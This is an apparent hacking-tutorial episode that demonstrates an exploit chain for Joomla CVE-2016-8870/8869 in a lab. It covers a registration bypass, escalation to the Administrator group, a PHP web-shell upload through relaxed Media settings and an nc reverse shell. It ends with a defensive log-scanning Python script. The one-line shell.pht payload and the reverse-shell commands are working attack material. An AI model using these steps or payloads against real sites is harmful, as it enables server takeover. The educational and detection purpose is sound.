#HackOnTuesday Episode 3 Exploiting the Joomla Account Creation and Privilege Escalation Vulnerability

In recent weeks, the entire security community has been shocked by two serious security vulnerabilities affecting all Joomla versions from 3.4.4 to 3.6.3: CVE-2016-8870 and CVE-2016-8869. By combining these vulnerabilities, an attacker can create a privileged user and potentially own the server hosting the Joomla website. In this episode, Gianni shows how to attack a Joomla site, upload a PHP shell, and get full access to the hosting server.

Tools, Scripts, and Exploits

1. Take a look at the changes/patch

» Go to the GitHub page and click “releases”
» Click 2983d19 and scroll down to see the changes from the previous version
» Most of the changes are in the components/com_users/controllers/user.php controller

2. Analyze the “normal” registration process

» Enable “User Registration”
   • Log in with the admin/password credentials
   • Go to System -> Global Configuration -> Users -> User Options and set “Allow User Registration” to “Yes”
» Create a user
   • Go to the vulnerable Joomla website
   • Click on “Author Login”
   • Click on “Don’t have an account?”
   • Enable the Burp Proxy
      - Run the run_burp.sh script and make sure the Proxy is on.
      - Set a proxy in Firefox
         - Go to Edit -> Preferences -> Advanced -> Network -> Settings
         - Host: / Port: 8080
   • Complete the registration form and press “Register”
   • Analyze the HTTP Request
      - The “option” parameter is the name of the Joomla component in components/
      - The “task” parameter is the name of the controller and method to be called
      - In this case, registration.register calls the UserModelRegistration.register method
         - cd components/com_users/
         - ls -l
         - vim models/registration.php
      - The UserModelRegistration.register method performs a few checks and, if registration is disabled, redirects the user to the login page! See line 114 of the controllers/registration.php file.

3. Analyze the patch

» The patch removes the “register” method from the “UsersControllerUser” class. That method never checks whether user registration is allowed, so an attacker can call it to create a new user even when the “Allow User Registration” option is set to “No”! In particular:
» At line 301, the register method gets the form data.
   • $data = $this->input->post->get('user', array(), 'array');
» At line 304, the register method gets the “UsersModelRegistration” model.
   • $model = $this->getModel('Registration', 'UsersModel');
» At line 306, the register method gets the registration form.
   • $form = $model->getForm();
» At line 315, the form data is validated.
   • $return = $model->validate($form, $data);
» At line 346, the register method finalizes the registration using the register method of the “UsersModelRegistration” model.
   • $return = $model->register($data);

4. Bypass the registration checks by calling the “register” method of the “User” controller

» Switch off the “Allow User Registration” option.
» Get the index.php/author-login page and take note of the CSRF token
» Send one of the earlier registration HTTP requests to the Burp Repeater
   • Change “jform” to “user”
   • Change “registration.register” to “user.register”
   • Change the CSRF token to the value of the hidden field in the login page.
   • Change the URL to /joomla/index.php?option=com_users&task=user.register
» Go back to the Admin console and check the list of users: the new account is there although registration is disabled.

5. Create a privileged user

» Go to Users -> User Groups and look for the ID of the Administrator group.
» Add a “user[groups][]” parameter in the request and use the default group ID of the Administrators group, 7.

6. Upload a PHP Shell

» Go to Content -> Media
» Click Options
» Add pht to “Legal Extensions (File Types)”
» Set “Restrict Uploads” and “Check MIME Types” to “No”
» Upload the shell.pht file

7. Get reverse shell

» Start a reverse shell listener on the attacker’s machine
   • nc -lvp 4444
» Connect back to the attacker machine
   • 4444 -e /bin/bash
» whoami
» Game Over!
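As an added defender-side example (not part of the original episode), the following Python scans web-server access-log lines for the two traces the steps above leave in the logs: a direct call to the removed user.register task, and a later request for a script file under the images directory where the Media Manager stores uploads. The log lines are constructed samples, and the /images/ upload location and the extension list are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in combined format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2016:10:01:02 +0000] "POST /joomla/index.php?option=com_users&task=registration.register HTTP/1.1" 303 512 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Oct/2016:10:05:44 +0000] "POST /joomla/index.php?option=com_users&task=user.register HTTP/1.1" 303 498 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Oct/2016:10:09:10 +0000] "GET /joomla/images/shell.pht?x=id HTTP/1.1" 200 61 "-" "curl/7.50.1"
10.0.0.7 - - [25/Oct/2016:10:11:30 +0000] "GET /joomla/index.php/author-login HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed list of script extensions that should never be served from the upload directory.
SCRIPT_EXTS = ('.pht', '.phtml', '.php')

def classify(line):
    """Return a reason string if the request matches one of the attack steps, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m['target'])
    qs = parse_qs(url.query)
    option = qs.get('option', [''])[0]
    task = qs.get('task', [''])[0]
    # Step 4: the removed UsersControllerUser::register method is called directly.
    if option == 'com_users' and task == 'user.register':
        return 'direct call to user.register (CVE-2016-8870 registration bypass)'
    # Step 6: a script file served from the images directory (assumed Media Manager location).
    if url.path.lower().endswith(SCRIPT_EXTS) and '/images/' in url.path:
        return 'script file requested under /images/ (possible uploaded web shell)'
    return None

def scan(log_text):
    """Return (client_ip, timestamp, reason) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        reason = classify(line)
        if reason:
            m = LOG_RE.match(line)
            hits.append((m['ip'], m['ts'], reason))
    return hits

if __name__ == '__main__':
    for ip, ts, reason in scan(SAMPLE_LOG):
        print(f'{ts} {ip}: {reason}')
```

The group escalation of step 5 travels in the POST body (the user[groups][] parameter), which access logs do not record, so catching it needs request-body logging or a WAF rule in front of index.php.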

Extra Files

shell.pht:

<?= system($_GET['x']); ?>

run_burp.sh:

java -Xmx1024m -jar burp.jar